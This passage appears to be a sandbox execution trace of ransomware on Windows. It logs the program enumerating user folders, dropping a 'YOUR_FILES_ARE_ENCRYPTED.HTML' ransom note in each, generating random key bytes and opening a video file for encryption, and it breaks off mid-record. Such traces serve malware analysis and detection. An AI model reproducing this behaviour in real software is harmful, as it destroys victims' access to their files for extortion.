lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*" [0168.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.774] GetProcessHeap () returned 0x270000 [0168.775] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.775] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0168.775] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games") returned 35 [0168.775] GetProcessHeap () returned 0x270000 [0168.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.775] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games" [0168.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*" [0168.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.775] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.776] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bccd50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.776] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\desktop.ini") returned 47 [0168.776] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.776] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.776] lstrlenW (lpString=".ini") returned 4 [0168.776] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.776] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bccd50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0168.776] FindClose (in: hFindFile=0x42f3140 | out: 
hFindFile=0x42f3140) returned 1 [0168.776] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0168.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.776] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.778] CloseHandle (hObject=0x5a0) returned 1 [0168.778] GetProcessHeap () returned 0x270000 [0168.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.779] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Searches", cAlternateFileName="")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches") returned 32 [0168.779] GetProcessHeap () returned 0x270000 [0168.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.779] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches" [0168.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*" [0168.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\desktop.ini") returned 44 [0168.779] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.779] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.779] lstrlenW (lpString=".ini") returned 4 [0168.779] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\Everywhere.search-ms") returned 53 [0168.779] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.780] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0168.780] lstrlenW (lpString=".search-ms") returned 10 [0168.780] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0168.780] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0168.780] wnsprintfW (in: 
pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\Indexed Locations.search-ms") returned 60 [0168.780] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.780] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0168.780] lstrlenW (lpString=".search-ms") returned 10 [0168.780] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0168.780] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0168.780] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.780] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\searches\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.780] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.782] CloseHandle (hObject=0x5a0) returned 1 [0168.782] GetProcessHeap () returned 
0x270000 [0168.783] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.783] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SendTo", cAlternateFileName="")) returned 1 [0168.783] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo") returned 30 [0168.783] GetProcessHeap () returned 0x270000 [0168.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.783] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo" [0168.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*" [0168.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.783] GetProcessHeap () returned 0x270000 [0168.784] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.784] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0168.784] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu") returned 34 [0168.784] GetProcessHeap () returned 0x270000 [0168.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.784] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu" [0168.784] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*" [0168.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.784] GetProcessHeap () returned 0x270000 [0168.785] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.785] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0168.785] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates") returned 33 [0168.785] GetProcessHeap () returned 0x270000 [0168.785] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.785] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates" [0168.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*" [0168.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.785] GetProcessHeap () returned 0x270000 [0168.786] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.786] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0168.786] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos") returned 30 [0168.786] GetProcessHeap () returned 0x270000 [0168.786] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.786] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos" [0168.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*" [0168.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.786] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.786] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeb14b30, ftCreationTime.dwHighDateTime=0x1d7de02, ftLastAccessTime.dwLowDateTime=0x856e4fb0, ftLastAccessTime.dwHighDateTime=0x1d7e2eb, ftLastWriteTime.dwLowDateTime=0x856e4fb0, ftLastWriteTime.dwHighDateTime=0x1d7e2eb, nFileSizeHigh=0x0, nFileSizeLow=0x1d2c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-2wj_ZU_TXUboswwa.flv", cAlternateFileName="-2WJ_Z~1.FLV")) returned 1 [0168.786] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv") returned 52 [0168.786] lstrcmpW (lpString1="-2wj_ZU_TXUboswwa.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.786] PathFindExtensionW (pszPath="-2wj_ZU_TXUboswwa.flv") returned=".flv" [0168.786] lstrlenW (lpString=".flv") returned 4 [0168.786] PathFindExtensionW (pszPath="-2wj_ZU_TXUboswwa.flv") returned=".flv" [0168.786] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\-2wj_zu_txuboswwa.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.787] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=7468) returned 1 [0168.787] GetProcessHeap () returned 0x270000 
[0168.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0168.790] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="7B") returned 2 [0168.790] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="FD") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="4C") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="8D") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F4") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A4") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="86") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5A") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="8E") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="38") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D7") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="7D") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="F2") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="07") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="41") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F9") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="83") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="19") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A9") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: 
